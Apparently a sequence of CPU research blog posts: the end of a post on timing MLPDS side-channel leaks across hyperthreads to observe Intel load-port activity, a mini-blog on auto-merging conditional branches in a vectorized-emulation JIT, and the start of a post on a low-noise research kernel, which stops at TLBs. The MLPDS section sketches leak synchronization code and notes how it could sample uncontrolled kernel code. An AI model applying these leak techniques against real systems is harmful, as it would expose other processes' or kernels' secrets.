We can perform an MLPDS attack on a delay, however we need a reference point to delay from. I’ll steal the oscilloscope terminology of a trigger, or a reference location to synchronize with. Similar to an oscilloscope, this trigger will synchronize us in the time domain each time we attempt the attack.

The easiest trigger we can use works only in an environment where we control both the leaking and secret threads, but in our case we have that control.

What we can do is simply have semaphores at each stage of the leak. We’ll have 2 hardware threads running with the following logic (a rough sketch in code follows the list):

  1. (Thread A running) (Thread B paused)
  2. (Thread A) Prepare to do a CPU attack, request thread B execute code
  3. (Thread A) Delay for a fixed amount of cycles with a spin loop
  4. (Thread B) Execute sample code
  5. (Thread A) At some “random” point during Thread B executing sample code, perform MLPDS attack to leak a value
  6. (Thread B) Complete sample code execution, wait for thread A to request another execution
  7. (Thread A) Log the observed value and the number of cycles in the delay loop
  8. goto 1 and do this many times until significant data is collected
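
Here’s that sketch, where mlpds_leak_u64() is a hypothetical stand-in for the actual leak primitive and the delay is a simple rdtsc spin:

use std::sync::atomic::{AtomicBool, Ordering};

static GO: AtomicBool = AtomicBool::new(false);

// Hypothetical stand-in for the MLPDS leak primitive described earlier
fn mlpds_leak_u64() -> Option<u64> { None }

// Thread B (the thread with the secrets): run the sample code when asked
fn thread_b(sample: fn()) -> ! {
    loop {
        while !GO.load(Ordering::SeqCst) {}
        sample();
        GO.store(false, Ordering::SeqCst);
    }
}

// Thread A (the attacker): request one execution, spin for `delay` cycles,
// attempt a single leak at that point, and log (delay, value) if it worked
fn thread_a_attempt(delay: u64) -> Option<(u64, u64)> {
    GO.store(true, Ordering::SeqCst);
    let start = unsafe { core::arch::x86_64::_rdtsc() };
    while unsafe { core::arch::x86_64::_rdtsc() } - start < delay {}
    let leaked = mlpds_leak_u64();
    while GO.load(Ordering::SeqCst) {} // wait for thread B to finish this run
    leaked.map(|val| (delay, val))
}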

Uncontrolled target code

If needed a trigger could be set on a “known value” at some point during execution if target code is not controllable. For example, if you’re attacking a kernel, you could identify a magic value or known user pointer which gets accessed close to the code under test. An MLPDS attack can be performed until this magic value is seen, then a delay can start, and another attack can be used to leak a value. This allows an uncontrolled target code to be sampled in a similar way. If the trigger “misses” it’s fine, just try again in another loop.

Did it work?

So we put all of these things together, but does it actually work? Let’s try our 2 load example, and we’ll make sure the loads depend on each other to ensure they don’t get re-ordered by the processor.

Prep code:

core::ptr::write_volatile(vaddr as *mut u64, 0x12341337cafefeed);              
core::ptr::write_volatile((vaddr as *mut u64).offset(1), 0x1337133713371337);  

Test code:

let ptr = core::ptr::read_volatile(vaddr as *mut usize);
core::ptr::read_volatile((vaddr as usize + (ptr & 0x8)) as *mut usize);

In this code we set up 2 dependent loads: one which reads a value, and then another which masks the value to extract the 0x8 bit, which is used as an offset for a subsequent access. Since the values are constants, we know that the second access will always access at offset 8, thus we expect to see a load of 0x1234... followed by 0x1337....

Graphing the data

To graph the data we have collected, we want to compute the frequency each value was seen at for every cycle offset. We’ll plot these with an x axis in cycles, and a y axis of the frequency the value was observed at that cycle count. Then we’ll overlay multiple graphs for the different values we’ve seen. Let’s check it out with our simple test code!
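
The aggregation itself is just bucketing the (cycle offset, leaked value) pairs, something along these lines:

use std::collections::HashMap;

// value -> (cycle offset -> number of times that value was observed there)
fn histogram(samples: &[(u64, u64)]) -> HashMap<u64, HashMap<u64, u64>> {
    let mut hist: HashMap<u64, HashMap<u64, u64>> = HashMap::new();
    for &(cycles, value) in samples {
        *hist.entry(value).or_default().entry(cycles).or_insert(0) += 1;
    }
    hist
}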

Sequenced leak example data Sequenced leak example data

Here we also introduce a normal distribution best-fit for each value type, and a vertical line through the mean frequency-weighted value.

And look at that! We see the first access (in light blue) indicating that the value 0x12341337cafefeed was read, and slightly after we see (in orange) the value 0x1337133713371337 was read! Exactly what we would have expected. How cool is that!? There’s some other noise on here from the testing harness, but they’re pretty easy to ignore in this case.


A real-data case

Let’s put it all together and take a look at what a load looks like on pages which have not yet been marked as accessed.

Load sequence example

Frequencies of observed values over time from load ports. Here we’re seeing the processor internally performing a microcode-assisted page table walk to update accessed and dirty bits. Only one load was performed by the user, these are all “invisible” loads done behind the scenes

Hmmm, this is a bit too noisy. Let’s re-collect the data but this time only look at the page table entry values and the value contained on the page we’re accessing.

Here are the page table entries for the memory we’re accessing in our example:

CR3   0x630000
PML4E 0x2cc7c007
PDPE  0x2cc7b007
PDE   0x2cc7a007
PTE   0x13370003
Data  0x12341337cafefeed

We’re going to reset all page table entries to their non-dirty, non-accessed states, invalidate the TLB for the page via invlpg, and then read from the memory once. This will cause all accessed bits to be updated in the page tables! Here’s what we get…

Annotated ucode page walk Annotated ucode-assist page walk as observed with this technique

Here it’s hard to say why we see the 3rd and 4th levels of the page table get hit, as well as the page contents, prior to the accessed bit updates. Perhaps the processor tries the access first, and when it realizes the accessed bits are not set it goes through and sets them all. We can see fairly clearly that after the page data is read ~300 cycles in, the processor performs a walk through each level of the page table. Presumably this is where the processor is reading the original entry values, ORing in the accessed bit, and moving to the next level!


Speeding it up

So far using our 64-bit MLPDS leak we can get about 8,000 leaks per second. This is a decent data rate, but when we’re wanting to sample data and draw statistical significance, more is always better. For each different value we want to log, and for each cycle count, we likely want about ~100 points of data. So let’s assume we want to sample 10 values over a 1000 cycle range, and we’ll likely want 1 million data points. This means we’ll need about 2 minutes worth of runtime to collect this data.

Luckily, there’s a relatively simple technique we can use to speed up the data rates. Instead of using the full arbitrary 64-bit leak for the whole test, we can use the arbitrary leak early on to determine the values of interest. We just want to use the arbitrary leak for long enough to determine the values which we know are accessed during our test case.

Once we know the values we actually want to leak, we can switch to using our known-value leak which allows for about 6 million leaks per second. Since this can only look for one value at a time, we’ll also have to cycle through the values in our “known value” list, but the speedup is still worth it until the known value list gets incredibly large.

With this technique, collecting the 1 million data points for something with 5-6 values to sample only takes about a second. A speedup of two orders of magnitude! This is the technique that I’m currently using, although I have a fallback to arbitrary value mode if needed for some future use.
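
In sketch form it’s just two phases, where leak_any_u64() and leak_is_value() are hypothetical wrappers around the two MLPDS primitives described above (and each attempt would re-run the trigger and delay from the previous section):

use std::collections::HashSet;

// Hypothetical wrappers around the two MLPDS primitives
fn leak_any_u64() -> Option<u64> { None }
fn leak_is_value(_val: u64) -> bool { false }

fn collect_samples(delays: std::ops::Range<u64>) -> Vec<(u64, u64)> {
    // Phase 1: use the slow arbitrary leak just long enough to learn which
    // values actually show up during the test case
    let mut known = HashSet::new();
    for _ in 0..100_000 {
        if let Some(val) = leak_any_u64() { known.insert(val); }
    }

    // Phase 2: switch to the ~6M/sec known-value leak, cycling through the
    // known values at each delay (repeat for as many samples as needed)
    let mut samples = Vec::new();
    for delay in delays {
        for &val in &known {
            if leak_is_value(val) { samples.push((delay, val)); }
        }
    }
    samples
}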


Conclusion

We introduced an interesting technique for monitoring Intel load port traffic cycle-by-cycle and demonstrated that it can be used to get meaningful data to learn how Intel micro-architecture works. While there is much more for us to poke around in, this was a simple example to show this technique!

Future

There is so much more I want to do with this work. First of all, this will just be polished in my toolbox and used for future CPU research. It’ll just be a good go-to tool for when I need a little bit more introspection. But, I’m sure as time goes on I’ll come up with new interesting things to monitor. Getting logging of store-port activity would be useful such that we could see the other side of memory transactions.

As with anything I do, performance is always an opportunity for improvement. Getting a higher-fidelity MLPDS exploit, potentially with higher throughput, would always help make collecting data easier. I’ve also got some fun ideas for filtering this data to remove “deterministic noise”. Since we’re attacking from a sibling hyperthread I suspect we’d see some deterministic sliding and interleaving of core usage. If I could isolate these down and remove the noise that’d help a lot.

I hope you enjoyed this blog! See you next time!


Miniblog: How conditional branches work in Vectorized Emulation

7 October 2019 at 07:11

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!

Let me know if you like this mini-blog format! It takes a lot less time than a whole blog, but I think will still have interesting content!


Prereqs

You should probably read the Introduction to Vectorized Emulation blog!

Or perhaps watch the talk I gave at RECON 2019

Summary

I spent this weekend working on a JIT for my IL (FalkIL, or fail). I thought this would be a cool opportunity to make a mini-blog describing how I currently handle conditional branches in vectorized emulation.

This is one of the most complex parts of vectorized emulation, and has a lot of depth. But today we’re going to go into a simple merging example: what I call the “auto-merge”. I call it an auto-merge because it doesn’t require any static analysis of potential merging points. The instructions that get emitted simply allow for auto re-merging of divergent VMs. It’s really simple, but pretty nifty. We have to perform this logic on every branch.


FalkIL Example

Here’s an example of what FalkIL looks like:

FalkIL example


JIT

Here’s what the JIT for the above IL example looks like:

FalkIL JIT example

Ooof… that exploded a bit. Let’s dive in!


JIT Calling Convention

Before we can go into what the JIT is doing, we have to understand the calling convention we use. It’s important to note that this calling convention is custom, and follows no standard convention.

Kmask Registers

Kmask registers are the bitmasks provided to us in hardware to mask off certain operations. Since we’re always executing instructions even if some VMs have been disabled, we must always honor the kmasks.

Intel provides us with 8 kmask registers. k0 through k7. k0 is hardcoded in hardware to all ones (no masking). Thus, we’re not able to use this for general purpose masking.

Online VM mask

Since at any given time we might be performing operations with VMs disabled, we need to have one kmask register always dedicated to holding the mask of VMs that are actively running. Since k1 is the first general purpose kmask we can use, that’s exactly what we pick. Any bit which is clear in k1 (VM is disabled), must not have its state modified. Thus you’ll see k1 is used as a merging mask for almost every single vectorized operation we do.

By using the k1 mask in every instruction, we preserve the lanes of vector registers which are disabled. This provides near-zero-cost preservation of disabled VM states, such that we don’t have to save/restore massive ZMM registers during divergence.

This mask must also be honored during scalar code that emulates complex vectorized operations (for example divs, which have no vectorized instruction).

“Following” VM mask

At some points during emulation we run into situations where VMs have to get disabled. For example, some VMs might take a true branch, and others might take the false (or “else”) side of a branch. In this case we need to make a decision (very quickly) about which VM to follow. To do this, we have a VM which we mark as the “following” VM. We store this “following” VM mask in k7. This always contains a single bit, and it’s the bit of the VM which we will always follow when we have to make divergence decisions.

The VM we are “following” must always be active, and thus (k7 & k1) != 0 must always be true! This k7 mask only has to be updated when we enter the JIT, thus the computation of which VM to “follow” may be complex as it will not be a common expense. While the JIT is executing, this k7 mask will never have to be updated unless the VM we are following causes a fault (at which point a new VM to follow will be computed).

Kmask Register Summary

Here’s the complete state of kmask register allocation during JIT

K0    - Hardcoded in hardware to all ones
K1    - Bitmask indicating "active/online" VMs
K2-K6 - Scratch kmask registers
K7    - "Following" VM mask

ZMM registers

The 512-bit ZMM registers are where we store most of our active contextual data. There are only 2 special case ZMM registers which we reserve.

“Following” VM index vector

Following in the same suit of the “Following VM mask”, mentioned above, we also store the index for the “following” VM in all 8 64-bit lanes of zmm30. This is needed to make decisions about which VM to follow. At certain points we will need to see which VM’s “agree with” the VM we are following, and thus we need a way to quickly broadcast out the following VMs values to all components of a vector.

By holding the index (effectively the bit index of the following VM mask) in all lanes of the zmm30 vector, we can perform a single vpermq instruction to broadcast the following VM’s value to all lanes in a vector.

Similar to the VM mask, this only needs to be computed when the JIT is entered and when faults occur. This means this can be a more expensive operation to fill this register up, as it stays the same for the entirety of a JIT execution (until a JIT/VM exit).

Why this is important

Lets say:

zmm31 contains [10, 11, 12, 13, 14, 15, 16, 17]

zmm30 contains [3, 3, 3, 3, 3, 3, 3, 3]

The CPU then executes vpermq zmm0, zmm30, zmm31

zmm0 now contains [13, 13, 13, 13, 13, 13, 13, 13]… the 3rd VM’s value in zmm31 broadcast to all lanes of zmm0

Effectively vpermq uses the indices in its second operand to select values from the third operand.
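
If it helps, here’s a tiny Rust model of the quadword lanes of that 3-operand ZMM form of vpermq:

// Each output lane takes the input lane named by the low 3 bits of the
// corresponding index lane (8 qword lanes in a ZMM register)
fn vpermq(indices: [u64; 8], values: [u64; 8]) -> [u64; 8] {
    let mut out = [0u64; 8];
    for lane in 0..8 {
        out[lane] = values[(indices[lane] & 7) as usize];
    }
    out
}

With every index lane holding the “following” VM’s index, every output lane ends up holding that VM’s value: a one-instruction broadcast.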

“Desired target” vector

We allocate one other ZMM register (zmm31) to hold the block identifiers for where each lane “wants” to execute. What this means is that when divergence occurs, zmm31 will have the corresponding lane updated to where the VM that diverged “wanted” to go. VMs which were disabled thus can be analyzed to see where they “wanted” to go, but instead they got disabled :(

ZMM Register Summary

Here’s the complete state of ZMM register allocation during JIT

Zmm0-Zmm3  - Scratch registers for internal JIT use
Zmm4-Zmm29 - Used for IL register allocation
Zmm30      - Index of the VM we are following broadcast to all 8 quadwords
Zmm31      - Branch targets for each VM, indicates where all VMs want to execute

General purpose registers

These are fairly simple. It’s a lot more complex when we talk about memory accesses and such, but we already talked about that in the MMU blog!

When ignoring the MMU, there are only 2 GPRs that we have a special use for…

Constant storage database

On the Knights Landing Xeon Phi (the CPU I develop vectorized emulation for), there is a huge bottleneck on the front-end and instruction decode. This means that loading a constant into a vector register by loading it into a GPR (mov), then moving it into the lowest-order lane of a vector (vmovq), and then broadcasting it (vpbroadcastq), is actually a lot more expensive than just loading that value from memory.

To enable this, we need a database which just holds constants. During the JIT, constants are allocated from this table (just appending to a list, while deduping shared constants). This table is then pointed to by r11 during JIT. During the JIT we can load a constant into all active lanes of a VM by doing a single vpbroadcastq zmm, kmask, qword [r11+OFFSET] instruction.

While this might not be ideal for normal Xeon processors, this is actually something that I have benchmarked, and on the Xeon Phi, it’s much faster to use the constant storage database.
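
The database itself is about as simple as it sounds; a sketch of the JIT-side allocation (names made up) could look like:

use std::collections::HashMap;

// Flat vector of quadwords (pointed to by r11 at runtime) plus a dedup map so
// repeated constants share a slot. The returned byte offset is what ends up
// as the displacement in the vpbroadcastq.
#[derive(Default)]
struct ConstDb {
    consts: Vec<u64>,
    dedup:  HashMap<u64, usize>,
}

impl ConstDb {
    fn alloc(&mut self, val: u64) -> usize {
        if let Some(&off) = self.dedup.get(&val) {
            return off;
        }
        let off = self.consts.len() * 8; // byte offset from r11
        self.consts.push(val);
        self.dedup.insert(val, off);
        off
    }
}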

Target registers

At the end of the day we’re emulating some other architecture. We hold all target architecture registers in memory pointed to by r12. It’s that simple. Most of the time we hold these in IL registers and thus aren’t incurring the cost of accessing memory.

GPR summary

r11 - Points to constant storage database (big vector of quadword constants)
r12 - Points to target architecture registers

Phew

Okay, now we know what register states look like when executing in JIT!


Conditional branches

Now we can get to the meat of this mini-blog! How conditional branches work using auto-merging! We’re going to go through instruction-by-instruction from the JIT graph we showed above.

Here’s the specific code in question for a conditional branch:

Conditional Branch

Well that looks awfully complex… but it’s really not. It’s quite magical!

The comparison

comparison

First, the comparison is performed on all lanes. Remember, ZMM registers hold 8 separate 64-bit values. We perform a 64-bit unsigned comparison on all 8 components, and store the results into k2. This means that k2 will hold a bitmask with the “true” results set to 1, and the “false” results set to 0. We also use the kmask k1 here, which means we only perform the comparison on VMs which are currently active. As a result of this instruction, k2 has the corresponding bits set to 1 for VMs which were actively executing at the time, and also resulted in a “true” value from their comparisons.

In this case the 0x1 immediate to the vpcmpuq instruction indicates that this is a “less than” comparison.

vpcmpq/vpcmpuq immediate

Note that the immediate value provided to vpcmpq and the unsigned variant vpcmpuq determines the type of the comparison:

cmpimm

The comparison inversion

comparison inversion

Next, we invert the comparison operation to get the bits set for active VMs which want to go to the “false” path. This instruction is pretty neat.

kandnw performs a bitwise negation of the second operand, and then ands with the third operand. This then is stored into the first operand. Since we have k2 as the second operand (the result of the comparison) this gets negated. This then gets anded with k1 (the third operand) to mask off VMs which are not actively executing. The result is that k3 now contains the inverted result from the comparison, but we keep “offline” VMs still masked off.

In C/C++ this is simply: k3 = (~k2) & k1

The branch target vector

branch targets

Now we start constructing zmm0… this is going to hold the “labels” for the targets each active lane wants to go to. Think of these “labels” as just a unique identifier for the target block they are branching to. In this case we use the constant storage database (pointed to by r11) to load up the target labels. We first load the “true target” labels into zmm0 by using the k2 kmask, the “true” kmask. After this, we merge the “false target” labels into zmm0 using k3, the “false/inverted” kmask.

After these 2 instructions execute, zmm0 now holds the target “labels” based on their corresponding comparison results. zmm0 now tells us where the currently executing VMs “want to” branch to.

The merge into master

merge into master

Now we merge the target branches for the active VMs which were just computed (zmm0), into the master target register (zmm31). Since VMs can be disabled via divergence, zmm31 holds the “master” copy of where all VMs want to go (including ones which have been masked off and are “waiting” to execute a certain target).

zmm31 now holds the target labels for every single lane with the updated results of this comparison!

Broadcasting the target

broadcasting the target

Now that we have zmm31 containing all of the branch targets, we now have to pick the one we are going to follow. To do this, we want a vector which contains the broadcasted target label of the VM we are following. As mentioned in the JIT calling convention section, zmm30 contains the index of the VM we are following in all 8 lanes.

Example

Lets say for example we are following VM #4 (zero-indexed).

zmm30 contains [4, 4, 4, 4, 4, 4, 4, 4]

zmm31 contains [block_0, block_0, block_1, block_1, block_2, block_2, block_2, block_2]

After the vpermq instruction we now have zmm1 containing [block_2, block_2, block_2, block_2, block_2, block_2, block_2, block_2].

Effectively, zmm1 will contain the block label for the target that the VM we are following is going to go to. This is ultimately the block we will be jumping to!

Auto-merging

auto-merging

This is where the magic happens. zmm31 contains where all the VMs “want to execute”, and zmm1 from the above instruction contains where we are actually going to execute. Thus, we compute a new k1 (active VM kmask) based on equality between zmm31 and zmm1.

Or in more simple terms… if a VM that was previously disabled was waiting to execute the block we’re about to go execute… bring it back online!
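
Modeling the lanes in plain Rust (with k-masks as u8 bitmaps), the whole auto-merge boils down to:

// zmm31 lanes = where every VM wants to go; following_target = the block the
// followed VM is about to jump to (zmm1). The new k1 is every VM, online or
// not, whose desired target matches, so waiting VMs come back online for free
fn auto_merge(desired_targets: [u64; 8], following_target: u64) -> u8 {
    let mut new_k1 = 0u8;
    for lane in 0..8 {
        if desired_targets[lane] == following_target {
            new_k1 |= 1 << lane;
        }
    }
    new_k1
}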

Doin’ the branch

branching

Now we’re at the end. k2 still holds the true targets. We AND this with k7 (the “following” VM mask) to figure out if the VM we are following is going to take the branch or not.

We then need to make this result “actionable” by getting it into the eflags x86 register such that we can conditionally branch. This is done with a simple kortestw instruction of k2 with itself. This will cause the zero flag to get set in eflags if k2 is equal to zero.

Once this is done, we can do a jnz instruction (same as jne), causing us to jump to the true target path if the k2 value is non-zero (if the VM we’re following is taking the true path). Otherwise we fall through to the “false” path (or potentially branch to it if it’s not directly following this block).


Update

After a little nap, I realized that I could save 2 instructions during the conditional branch. I knew something was a little off as I’ve written similar code before and I never needed an inverse mask.

updated JIT

Here we’ll note that we removed 2 instructions. We no longer compute the inverse mask. Instead, we initially store the false target block labels into zmm31 using the online mask (k1). This temporarily marks that “all online VMs want to take the false target”. Then, using the k2 mask (true targets), we merge the true target block labels over zmm31.

Simple! We remove the inverse mask computation (kandnw) and the zmm0 temporary, merging directly into zmm31. The effect is exactly the same as the previous version.

Not quite sure why I thought the inverse mask was needed, but it goes to show that a little bit of rest goes a long way!
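
To make the lane bookkeeping a bit more concrete, below is a tiny scalar Rust model of the updated sequence. Everything here (the Label type, the function and parameter names) is purely illustrative; the real JIT does this with zmm registers and kmasks rather than arrays and bools, but the data flow is the same.

// Scalar model of the auto-merging conditional branch described above.
// Each "register" is an array of 8 lanes, each kmask an array of 8 bools.
type Label = u64;

fn conditional_branch(
    online: &mut [bool; 8],         // k1: which VMs are currently executing
    following: usize,               // index of the VM we are following (zmm30)
    cond_true: [bool; 8],           // k2: per-lane comparison results
    master_target: &mut [Label; 8], // zmm31: where every lane wants to go
    true_target: Label,
    false_target: Label,
) -> Label {
    // All online VMs tentatively want the false target...
    for lane in 0..8 {
        if online[lane] {
            master_target[lane] = false_target;
        }
    }
    // ...and the lanes whose comparison was true get the true target instead
    for lane in 0..8 {
        if online[lane] && cond_true[lane] {
            master_target[lane] = true_target;
        }
    }

    // Broadcast the target of the followed VM (the vpermq step)
    let chosen = master_target[following];

    // Auto-merge: any VM, even a previously offline one, that is waiting on
    // the block we're about to execute comes back online
    for lane in 0..8 {
        online[lane] = master_target[lane] == chosen;
    }

    // This is the block the JIT actually jumps to
    chosen
}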

Due to instruction decode pressure on the Xeon Phi (2 instructions decoded per cycle), this change is a minimum 1 cycle improvement. Further, it’s a reduction of 8 bytes of code per conditional branch, which reduces L1i pressure. This is likely in the single digit percentages for overall JIT speedup, as conditional branches are everywhere!


Fin

And that’s it! That’s currently how I handle auto-merging during conditional branches in vectorized emulation as of today! This code is often changed and this is probably not its final form. There might be a simpler way to achieve this (fewer instructions, or lower latency instructions)… but progress always happens over time :)

It’s important to note that this auto-merging isn’t perfect, and most cases will result in VMs hanging, but this is an extremely low cost way to bring VMs online dynamically in even the tightest loops. More macro-scale merging can be done with smarter static-analysis and control flow decisions.

I hope this was a fun read! Let me know if you want more of these mini-blogs.


Sushi Roll: A CPU research kernel with minimal noise for cycle-by-cycle micro-architectural introspection

19 August 2019 at 07:11

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!

Summary

In this blog we’re going to go into details about a CPU research kernel I’ve developed: Sushi Roll. This kernel uses multiple creative techniques to measure undefined behavior on Intel micro-architectures. Sushi Roll is designed to have minimal noise such that tiny micro-architectural events can be measured, such as speculative execution and cache-coherency behavior. With creative use of performance counters we’re able to accurately plot micro-architectural activity on a graph with an x-axis in cycles.

We’ll go a lot more into detail about what everything in this graph means later in the blog, but here’s a simple example of just some of the data we can collect:

Example uarch activity Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis

Agenda

This is a relatively long blog and will be split into 4 major sections.

  • The gears that turn in your CPU: A high-level explanation of modern Intel micro-architectures
  • Sushi Roll: The design of the low-noise research kernel
  • Cycle-by-cycle micro-architectural introspection: A unique usage of performance counters to observe cycle-by-cycle micro-architectural behaviors
  • Results: Putting the pieces together and making graphs of cool micro-architectural behavior

Why?

In the past year I’ve spent a decent amount of time doing CPU vulnerability research. I’ve written proof-of-concept exploits for nearly every CPU vulnerability, from many attacker perspectives (user leaking kernel, user/kernel leaking hypervisor, guest leaking other guest, etc). These exploits allowed us to provide developers and researchers with real-world attacks to verify mitigations.

CPU research happens to be an overlap of my two primary research interests: vulnerability research and high-performance kernel development. I joined Microsoft in the early winter of 2017 and this lined up pretty closely with the public release of the Meltdown and Spectre CPU attacks. As I didn’t yet have much on my plate, the idea was floated that I could look into some of the CPU vulnerabilities. I got pretty lucky with this timing, as I ended up really enjoying the work and ended up sinking most of my free time into it.

My workflow for research often starts with writing some custom tools for measuring and analysis of a given target. Whether the target is a web browser, PDF parser, remote attack surface, or a CPU, I’ve often found that the best thing you can do is just make something new. Try out some new attack surface, write a targeted fuzzer for a specific feature, etc. Doing something new doesn’t have to be better or more difficult than something that was done before, as often there are completely unexplored surfaces out there. My specialty is introspection. I find unique ways to measure behaviors, which then fuels the idea pool for code auditing or fuzzer development.

This leads to an interesting situation in CPU research… it’s largely blind. Lots of the current CPU research is done based on writing snippets of code and reviewing the overall side-effects of it (via cache timing, performance counters, etc). These overall side-effects may also include noise from other processor activity, from the OS task switching processes, other cores changing the MESI-state of cache lines, etc. I happened to already have a low-noise no-shared-memory research kernel that I developed for vectorized emulation on Xeon Phis! This led to a really good starting point for throwing in some performance counters and measuring CPU behaviors… and the results were a bit better than expected.

TL;DR: I enjoy writing tools to measure things, so I wrote a tool to measure undefined CPU behavior.


The gears that turn in your CPU

Feel free to skip this section entirely if you’re familiar with modern processor architecture

Your modern Intel CPU is a fairly complex beast when you care about every technical detail, but let’s look at it from a higher level. Here’s what the micro-architecture (uArch) looks like in a modern Intel Skylake processor.

Skylake diagram Skylake uArch diagram, Diagram from WikiChip

There are 3 main components: The front end, which converts complex x86 instructions into groups of micro-operations. The execution engine, which executes the micro-operations. And the memory subsystem, which makes sure that the processor is able to get streams of instructions and data.


Front End

The front end covers almost everything related to figuring out which micro-operations (uops) need to be dispatched to the execution engine in order to accomplish a task. The execution engine on a modern Intel processor does not directly execute x86 instructions, rather these instructions are converted to these micro-operations which are fixed in size and specific to the processor micro-architecture.

Instruction fetch and cache

There’s a lot that happens prior to the actual execution of an instruction. First, the memory containing the instruction is read into the L1 instruction cache, ideally brought in from the L2 cache so as to minimize delay. At this point the instruction is still a macro-op (a variable-length x86 instruction), which is quite a pain to work with. The processor still doesn’t know how large the instruction is, so during pre-decode the processor will do an initial length decode to determine the instruction boundaries.

At this point the instruction has been chopped up and is ready for the instruction queue!

Instruction Queue and Macro Fusion

Instructions that come in for execution might be quite simple, and could potentially be “fused” into a complex operation. This stage is not publicly documented, but we know that a very common fusion is combining compare instructions with conditional branches. This allows a common instruction pattern like:

cmp rax, 5
jne .offset

To be combined into a single macro-op with the same semantics. This complex fused operation now only takes up one slot in many parts of the CPU pipeline, rather than two, freeing up more resources to other operations.

Decode

Instruction decode is where the x86 macro-ops get converted into micro-ops. These micro-ops vary heavily by uArch, and allow Intel to regularly change fundamentals in their processors without affecting backwards compatibility with the x86 architecture. There’s a lot of magic that happens in the decoder, but mostly what matters is that the variable-length macro-ops get converted into the fixed-length micro-ops. There are multiple ways that this conversion happens. Instructions might directly convert to uops, and this is the common path for most x86 instructions. However, some instructions, or even processor conditions, may cause something called microcode to get executed.

Microcode

Some instructions in x86 trigger microcode to be used. Microcode is effectively a tiny collection of uops which will be executed on certain conditions. Think of this like a C/C++ macro, where you can have a one-liner for something that expands to much more. When an operation does something that requires microcode, the microcode ROM is accessed and the uops it specifies are placed into the pipeline. These are often complex operations, like switching operating modes, reading/writing internal CPU registers, etc. This microcode ROM also gives Intel an opportunity to make changes to instruction behaviors entirely with a microcode patch.

uop Cache

There’s also a uop cache which allows previously decoded instructions to skip the entire pre-decode and decode process. Like standard memory caching, this provides a huge speedup and dramatically reduces bottlenecks in the front-end.

Allocation Queue

The allocation queue is responsible for holding a bunch of uops which need to be executed. These are then fed to the execution engine when the execution engine has resources available to execute them.


Execution engine

The execution engine does exactly what you would expect: it executes things. But at this stage your processor starts moving your instructions around to speed things up.

Things start to get a bit complex at this point!

Renaming / Allocating / Retirement

Resources need to be allocated for certain operations. There are a lot more registers in the processor than the standard x86 registers. These registers are allocated out for temporary operations, and often mapped onto their corresponding x86 registers.

There are a lot of optimizations the CPU can do at this stage. It can eliminate register moves by aliasing registers (such that two x86 registers “point to” the same internal register). It can remove known zeroing instructions (like xor with self, or and with zero) from the pipeline, and just zero the registers directly. These optimizations are frequently improved each generation.

Finally, when instructions have completed successfully, they are retired. This retirement commits the internal micro-architectural state back out to the x86 architectural state. It’s also when memory operations become visible to other CPUs.

Re-ordering

uOP re-ordering is important to modern CPU performance. Future instructions which do not depend on the current instruction can execute while waiting for the results of the current one.

For example:

mov rax, [rax]
add rbx, rcx

In this short example we see that we perform a 64-bit load from the address in rax and store it back into rax. Memory operations can be quite expensive, ranging from 4 cycles for a L1 cache hit, to 250 cycles and beyond for an off-processor memory access.

The processor is able to realize that the add rbx, rcx instruction does not need to “wait” for the result of the load, and can send off the add uop for execution while waiting for the load to complete.

This is where things can start to get weird. The processor starts to perform operations in a different order than what you told it to. The processor then holds the results and makes sure they “appear” to other cores in the correct order, as x86 is a strongly-ordered architecture. Other architectures like ARM are typically weakly-ordered, and it’s up to the developer to insert fences in the instruction stream to tell the processor the specific order operations need to complete in. This ordering is not an issue on a single core, but it may affect the way another core observes the memory transactions you perform.

For example:

Core 0 executes the following:

mov [shared_memory.pointer], rax ; Store the pointer in `rax` to shared memory
mov [shared_memory.owned],   0   ; Mark that we no longer own the shared memory

Core 1 executes the following:

.try_again:
    cmp [shared_memory.owned], 0 ; Check if someone owns this memory
    jne .try_again               ; Someone owns this memory, wait a bit longer

    mov rax, [shared_memory.pointer] ; Get the pointer
    mov rax, [rax]                   ; Read from the pointer

On x86 this is safe, as all aligned loads and stores are atomic, and are committed in a way that they appear in-order to all other processors. On something like ARM the owned value could be written prior to the pointer being written, allowing core 1 to use a stale/invalid pointer.
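
For reference, here’s roughly how the same handoff could be written portably with Rust atomics, where the Release/Acquire pair supplies the ordering guarantees that weakly-ordered architectures need (on x86, aligned loads and stores give you this essentially for free). This is just an illustrative analogue, not code from any of the projects discussed here.

use std::sync::atomic::{AtomicBool, AtomicPtr, Ordering};

struct Shared {
    pointer: AtomicPtr<u64>,
    owned:   AtomicBool,
}

// Core 0: publish the pointer, then release ownership. The Release store
// guarantees the pointer store is visible before `owned` flips to false.
fn core0(shared: &Shared, data: *mut u64) {
    shared.pointer.store(data, Ordering::Relaxed);
    shared.owned.store(false, Ordering::Release);
}

// Core 1: spin until ownership is released, then read through the pointer.
// The Acquire load pairs with the Release store above, so the pointer read
// can never observe a stale value.
fn core1(shared: &Shared) -> u64 {
    while shared.owned.load(Ordering::Acquire) {
        std::hint::spin_loop();
    }
    let ptr = shared.pointer.load(Ordering::Relaxed);
    unsafe { ptr.read() }
}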

Execution Units

Finally we got to an easy part: the execution units. This is the silicon that is responsible for actually performing maths, loads, and stores. The core has multiple copies of this hardware logic for some of the common operations, which allows the same operation to be performed in parallel on separate data. For example, an add can be performed on 4 different execution units.

For things like loads, there are 2 load ports (port 2 and port 3), this allows 2 independent loads to be executed per cycle. Stores on the other hand, only have one port (port 4), and thus the core can only perform one store per cycle.


Memory subsystem

The memory subsystem on Intel is pretty complex, but we’re only going to go into the basics.

Caches

Caches are critical to modern CPU performance. RAM latency is so high (150-250 cycles) that a CPU is largely unusable without a cache. For example, if a modern x86 processor at 2.2 GHz had all caches disabled, it would never be able to execute more than ~15 million instructions per second. That’s as slow as an Intel 80486 from 1991.

When working on my first hypervisor I actually disabled all caching by mistake, and Windows took multiple hours to boot. It’s pretty incredible how important caches are.

For x86 there are typically 3 levels of cache: A level 1 cache, which is extremely fast, but small: 4 cycles latency. Followed by a level 2 cache, which is much larger, but still quite small: 14 cycles latency. Finally there’s the last-level-cache (LLC, typically the L3 cache), this is quite large, but has a higher latency: ~60 cycles.

The L1 and L2 caches are present in each core, however, the L3 cache is shared between multiple cores.

Translation Lookaside Buffers (TLBs)

